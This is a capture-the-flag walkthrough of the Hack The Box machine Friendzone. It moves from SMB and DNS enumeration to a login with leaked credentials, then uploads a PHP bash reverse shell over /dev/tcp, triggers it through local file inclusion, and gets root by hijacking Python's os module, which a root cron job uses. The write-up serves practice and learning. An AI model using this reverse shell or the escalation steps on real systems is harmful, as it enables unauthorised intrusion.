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Hack The Box - Friendzone

Today, we are going to pwn Friendzone from Hack The Box.

Methodology #

  • Nmap scan of the machine
  • Checking SMB service and HTTP
  • Using dig to get subdomians
  • Uploading PHP reverse shell
  • Callback the reverse shell by exploiting LFI(Local File Inclusion)
  • Getting user flag and SSH credentials
  • Using cronjob to get root flag

Nmap #

Starting off with the nmap, nmap -sV -sC -A shows so many open ports but we have to start somewhere. It includes:-

  • 21 - FTP
  • 22 - SSH
  • 53 - DNS
  • 80 - HTTP
  • 139 & 445 - SMB
  • 443 - SSL/HTTP

SMB and HTTP Enumeration #

Using smbmap reveals we have access to general for read only and Development for read/write access. So, we connect to SMB by using smbclient // -u root reveals we see creds.txt so we get it on our machine.

Now, Developement seems empty so I headover to HTTP port, it was basic html page without only one useful information subdomain. We noticed it has a subdomian named Running gobuster reveals nothing useful, so I moved on to DNS recon.

DNS Enumeration and Login #

Using dig axrf @ reveals a so heading over to that shows a login page, loggin with the previous obtained credentials admin:WORKWORKHhallelujah@# , tell us to redirect to dashboard.php.

Exploiting LFI vulnerability and callback Reverse Shell #

This page seems told us to access url default is image_id=a.jpg&pagename=timestamp, seems LFI isn’t it?

From previous SMB enumeration we knew that Development directory has read/write access so using php reverse shell wecan get access to friendzone machine.

Using folllowing code as phpinfo.php:-

exec(“/bin/bash -c ‘bash -i >& /dev/tcp/ 0>&1’”);

we uploaded it to Development directory by

curl --upload-file phpinfo.php -u 'root' smb://, we uploaded our shell.

Callback #

From previously found LFI, we access the our phpinfo file by

Not a.jpg because it was default so no need to, so back to our listener we get a shell.

User Flag #

Once your listener get connected to our uploaded reverse shell you can get user flag.

Getting SSH Credentials #

Checking directory and file reveals a interseting file named mysql_data.conf has following credentials:-

for development process this is the mysql creds for user friend




SSH Login and root flag #

Well, we login to ssh using previous credentials.

Analyzing Running Processes #

There was a ELF file named pspy64, executing it shows running jobs in which we can very interesting process whuch was a python file.

Head over /opt/server_admin/ shows a nothing more than bunch of commented out line of python code.


import os

to_address = “”
from_address = “”

print “[+] Trying to send email to %s”%to_address

#command = ‘’’ mailsend -to -from -ssl -port 465 -auth -smtp scheduled results email +cc +bc -v -user you -pass “PAPAP”’’’


# I need to edit the script later
# Sam ~ python developer

We can see a line importing python os module, since we don’t have modify permissions for we head over /usr/bin/python2.7 we can edit i.e python’s os module which has a function which allows us to execute any command by passing them as parameter.

For example:-

import os
os.sytem('whoami') #friend

So we add a single line of code at the very end of

system('cp /root/root.txt /tmp/root1.txt') # calling system functon and copying flag

Hence, waiting for few minutes gives root1.txt.


Hack The Box